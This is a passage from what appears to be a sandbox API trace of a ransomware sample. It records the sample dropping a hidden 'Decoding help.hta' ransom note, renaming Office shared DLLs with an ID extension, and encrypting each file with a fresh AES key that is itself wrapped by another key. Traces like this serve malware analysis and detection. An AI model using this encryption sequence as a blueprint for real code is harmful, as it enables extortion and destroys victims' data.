Shared\\EURO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*" [0042.386] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*") returned 59 [0042.386] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Decoding help.hta" [0042.386] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\decoding help.hta")) returned 0xffffffff [0042.386] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x618 [0042.410] WriteFile (in: hFile=0x618, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x13cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x13cdfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.411] CloseHandle (hObject=0x618) returned 1 [0042.411] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.411] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSOEURO.DLL") returned -1 [0042.411] lstrlenW (lpString="MSOEURO.DLL") returned 11 [0042.411] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*" [0042.411] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*") returned 59 [0042.411] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", lpString2="MSOEURO.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" [0042.411] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" [0042.411] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0042.412] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.412] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x618 [0042.412] CreateFileMappingA (hFile=0x618, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x61c [0042.412] CryptAcquireContextA (in: phProv=0x13cdfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x13cdfcec*=0x34489c8) returned 1 [0042.413] CryptGenKey (in: hProv=0x34489c8, Algid=0x6610, dwFlags=0x1, phKey=0x13cdfce8 | out: phKey=0x13cdfce8*=0x5db978) returned 1 [0042.413] CryptExportKey (in: hKey=0x5db978, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x13cdfbe4, pdwDataLen=0x13cdfce4 | out: pbData=0x13cdfbe4*, pdwDataLen=0x13cdfce4*=0x2c) returned 1 [0042.413] MapViewOfFile (hFileMappingObject=0x61c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7980) returned 0x530000 [0044.046] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x13cdfbe4*, pdwDataLen=0x13cdfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x13cdfbe4*, pdwDataLen=0x13cdfcf8*=0x100) returned 1 [0046.339] CryptEncrypt (in: hKey=0x5db978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000, pdwDataLen=0x13cdfce4*=0x7980, dwBufLen=0x7980 | out: pbData=0x530000*, pdwDataLen=0x13cdfce4*=0x7980) returned 1 [0046.340] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0046.341] CloseHandle (hObject=0x61c) returned 1 [0046.341] CryptDestroyKey (hKey=0x5db978) returned 1 [0046.341] CryptReleaseContext (hProv=0x34489c8, dwFlags=0x0) returned 1 [0046.341] SetFilePointerEx (in: hFile=0x618, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.342] WriteFile (in: hFile=0x618, lpBuffer=0x13cdfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x13cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x13cdfbe4*, lpNumberOfBytesWritten=0x13cdfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.343] WriteFile (in: hFile=0x618, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x13cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x13cdfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.343] CloseHandle (hObject=0x618) returned 1 [0046.344] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.345] FindNextFileW (in: hFindFile=0x5db7f8, lpFindFileData=0x13cdfd30 | out: lpFindFileData=0x13cdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 0 [0046.345] FindClose (in: hFindFile=0x5db7f8 | out: hFindFile=0x5db7f8) returned 1 Thread: id = 284 os_tid = 0x4fc [0042.320] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*", lpFindFileData=0x13e1fd30 | out: lpFindFileData=0x13e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db7b8 [0042.385] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.385] FindNextFileW (in: hFindFile=0x5db7b8, lpFindFileData=0x13e1fd30 | out: lpFindFileData=0x13e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.385] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.385] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.385] FindNextFileW (in: hFindFile=0x5db7b8, lpFindFileData=0x13e1fd30 | out: lpFindFileData=0x13e1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x9770, dwReserved0=0x0, dwReserved1=0x0, cFileName="msgfilt.dll", cAlternateFileName="")) returned 1 [0042.385] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*" [0042.385] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*") returned 62 [0042.385] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Decoding help.hta" [0042.385] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\decoding help.hta")) returned 0xffffffff [0042.385] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x618 [0042.407] WriteFile (in: hFile=0x618, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x13e1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x13e1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.408] CloseHandle (hObject=0x618) returned 1 [0042.409] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.409] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msgfilt.dll") returned -1 [0042.409] lstrlenW (lpString="msgfilt.dll") returned 11 [0042.409] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*" [0042.409] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*") returned 62 [0042.409] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", lpString2="msgfilt.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" [0042.409] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" [0042.409] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.409] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.445] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x62c [0042.445] CreateFileMappingA (hFile=0x62c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x63c [0042.445] CryptAcquireContextA (in: phProv=0x13e1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x13e1fcec*=0x3448830) returned 1 [0042.446] CryptGenKey (in: hProv=0x3448830, Algid=0x6610, dwFlags=0x1, phKey=0x13e1fce8 | out: phKey=0x13e1fce8*=0x6711f0) returned 1 [0042.446] CryptExportKey (in: hKey=0x6711f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x13e1fbe4, pdwDataLen=0x13e1fce4 | out: pbData=0x13e1fbe4*, pdwDataLen=0x13e1fce4*=0x2c) returned 1 [0042.446] MapViewOfFile (hFileMappingObject=0x63c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9760) returned 0x25b0000 [0044.047] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x13e1fbe4*, pdwDataLen=0x13e1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x13e1fbe4*, pdwDataLen=0x13e1fcf8*=0x100) returned 1 [0046.468] CryptEncrypt (in: hKey=0x6711f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x25b0000, pdwDataLen=0x13e1fce4*=0x9760, dwBufLen=0x9760 | out: pbData=0x25b0000*, pdwDataLen=0x13e1fce4*=0x9760) returned 1 [0046.525] UnmapViewOfFile (lpBaseAddress=0x25b0000) returned 1 [0046.527] CloseHandle (hObject=0x63c) returned 1 [0046.527] CryptDestroyKey (hKey=0x6711f0) returned 1 [0046.527] CryptReleaseContext (hProv=0x3448830, dwFlags=0x0) returned 1 [0046.527] SetFilePointerEx (in: hFile=0x62c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.527] WriteFile (in: hFile=0x62c, lpBuffer=0x13e1fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x13e1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x13e1fbe4*, lpNumberOfBytesWritten=0x13e1fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.528] WriteFile (in: hFile=0x62c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x13e1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x13e1fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.528] CloseHandle (hObject=0x62c) returned 1 [0046.529] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.530] FindNextFileW (in: hFindFile=0x5db7b8, lpFindFileData=0x13e1fd30 | out: lpFindFileData=0x13e1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x6b29d7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x140790, dwReserved0=0x0, dwReserved1=0x0, cFileName="odffilt.dll", cAlternateFileName="")) returned 1 [0046.530] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*" [0046.530] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*") returned 62 [0046.530] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Decoding help.hta" [0046.530] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\decoding help.hta")) returned 0x1 [0046.530] lstrcmpiW (lpString1="Decoding help.hta", lpString2="odffilt.dll") returned -1 [0046.530] lstrlenW (lpString="odffilt.dll") returned 11 [0046.530] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*" [0046.530] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*") returned 62 [0046.530] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", lpString2="odffilt.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" [0046.530] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" [0046.530] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0046.530] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.551] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x62c [0046.551] CreateFileMappingA (hFile=0x62c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x63c [0046.551] CryptAcquireContextA (in: phProv=0x13e1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x13e1fcec*=0x3448830) returned 1 [0046.552] CryptGenKey (in: hProv=0x3448830, Algid=0x6610, dwFlags=0x1, phKey=0x13e1fce8 | out: phKey=0x13e1fce8*=0x671230) returned 1 [0046.552] CryptExportKey (in: hKey=0x671230, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x13e1fbe4, pdwDataLen=0x13e1fce4 | out: pbData=0x13e1fbe4*, pdwDataLen=0x13e1fce4*=0x2c) returned 1 [0046.552] MapViewOfFile (hFileMappingObject=0x63c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x5590000 [0046.642] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x13e1fbe4*, pdwDataLen=0x13e1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x13e1fbe4*, pdwDataLen=0x13e1fcf8*=0x100) returned 1 [0046.642] CryptEncrypt (in: hKey=0x671230, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5590000, pdwDataLen=0x13e1fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x5590000*, pdwDataLen=0x13e1fce4*=0x100000) returned 1 [0048.202] UnmapViewOfFile (lpBaseAddress=0x5590000) returned 1 [0048.392] CloseHandle (hObject=0x63c) returned 1 [0048.392] CryptDestroyKey (hKey=0x671230) returned 1 [0048.392] CryptReleaseContext (hProv=0x3448830, dwFlags=0x0) returned 1 [0048.392] SetFilePointerEx (in: hFile=0x62c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.392] WriteFile (in: hFile=0x62c, lpBuffer=0x13e1fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x13e1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x13e1fbe4*, lpNumberOfBytesWritten=0x13e1fcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.038] WriteFile (in: hFile=0x62c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x13e1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x13e1fcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.038] CloseHandle (hObject=0x62c) returned 1 [0051.586] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.280] FindNextFileW (in: hFindFile=0x5db7b8, lpFindFileData=0x13e1fd30 | out: lpFindFileData=0x13e1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x16af90, dwReserved0=0x0, dwReserved1=0x0, cFileName="offfiltx.dll", cAlternateFileName="")) returned 1 [0055.280] lstrcpyW (in: lpString1=0x10fcf5c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*" [0055.280] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*") returned 62 [0055.280] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Decoding help.hta" [0055.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\decoding help.hta")) returned 0x1 [0055.280] lstrcmpiW (lpString1="Decoding help.hta", lpString2="offfiltx.dll") returned -1 [0055.280] lstrlenW (lpString="offfiltx.dll") returned 12 [0055.280] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*" [0055.280] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*") returned 62 [0055.280] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", lpString2="offfiltx.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" [0055.281] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" [0055.281] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0055.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0056.150] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 